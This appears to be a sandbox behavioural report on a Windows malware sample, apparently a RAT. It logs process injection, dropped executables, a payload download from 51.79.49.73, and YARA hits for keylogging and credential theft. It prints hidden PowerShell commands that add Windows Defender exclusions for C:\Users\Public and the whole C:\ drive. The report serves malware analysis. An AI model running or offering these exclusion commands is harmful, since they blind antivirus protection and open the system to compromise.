NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b25000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b26000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b27000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b28000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b29000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b2a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b2d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b2e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b2f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b33000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b34000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\Public\Videos\Play.exe
file	C:\Users\Public\Videos\bz.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Public"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Public"
cmdline	powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\'"

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW June 20, 2023, 9:34 a.m.	thread_identifier: 1188 thread_handle: 0x00000088 process_identifier: 1376 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\'" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1	0
ShellExecuteExW June 20, 2023, 9:34 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Public" filepath: powershell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 2244 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 24576 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x00460000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process bz.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
recv June 20, 2023, 9:34 a.m.	buffer: HTTP/1.1 200 OK Date: Tue, 20 Jun 2023 00:35:12 GMT Server: Apache/2.4.56 (Debian) Last-Modified: Mon, 12 Jun 2023 09:57:37 GMT ETag: "41432-5fdebbf966640" Accept-Ranges: bytes Content-Length: 267314 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}æ£Ù9Í9Í9ÍºÃ8ÍPÄ?ÍÐÀ8ÍRich9ÍPEL»ëdà°0ÌÀ@ða´(àÄ( l.text ª° `.dataÀÀ@À.rsrcÄàÐ@@¼ç¨^MSVBVM60.DLL received: 1024 socket: 732	1	1024	0
InternetReadFile June 20, 2023, 9:34 a.m.	buffer: MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}æ£Ù9Í9Í9ÍºÃ8ÍPÄ?ÍÐÀ8ÍRich9ÍPEL»ëdà°0ÌÀ@ða´(àÄ( l.text ª° `.dataÀÀ@À.rsrcÄàÐ@@¼ç¨^MSVBVM60.DLL request_handle: 0x00cc000c	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 20, 2023, 9:34 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW June 20, 2023, 9:34 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Steal credential	rule	local_credential_Steal
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	File Downloader	rule	Network_Downloader

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Public"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Public"
cmdline	powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\'"

Communicates with host for which no DNS query was performed (1 event)

host

51.79.49.73

Drops a binary and executes it (1 event)

file	C:\Users\Public\Videos\bz.exe

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 792 resumed a thread in remote process 2244
NtResumeThread June 20, 2023, 9:34 a.m.	thread_handle: 0x00000090 suspend_count: 0 process_identifier: 2244	1	0	0

Creates a suspicious Powershell process (4 events)

option	-noninteractive	value	Prevents creating an interactive prompt for the user
option	-noninteractive	value	Prevents creating an interactive prompt for the user
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-noninteractive	value	Prevents creating an interactive prompt for the user

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

exclusion and run rat.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All